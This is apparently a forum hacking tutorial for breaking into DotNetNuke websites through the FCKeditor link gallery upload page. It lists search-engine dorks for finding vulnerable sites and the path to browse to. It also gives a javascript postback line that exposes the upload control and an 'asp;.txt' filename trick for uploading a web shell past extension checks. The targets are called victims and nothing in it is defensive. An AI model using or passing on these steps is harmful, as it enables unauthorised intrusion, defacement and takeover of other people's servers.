Dorks you can use for searching vulnerable websites :
- Code:
-
inurl:fcklinkgallery.aspx
inurl:/portals/0/
When you find website like this :
- Code:
-
http://www.victimsite.com/portals/0/pres/
Replace everything after the domain "
/" domain with :
- Code:
-
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Then you will see like this :
- Code:
-
http://www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Hit enter and you will get something like this :
[You must be registered and logged in to see this image.]Now select upload from file and paste this into your
address bar :
- Code:
-
javascript:__doPostBack('ctlURL$cmdUpload','')
Select file to upload. It must be video, text image or similar unless admin disabled something.
If you want to upload shell which is one of the very good choice and rename it to :
- Code:
-
anythingyoulike.asp;.txt
Now upload it and go to folder where you uploaded it.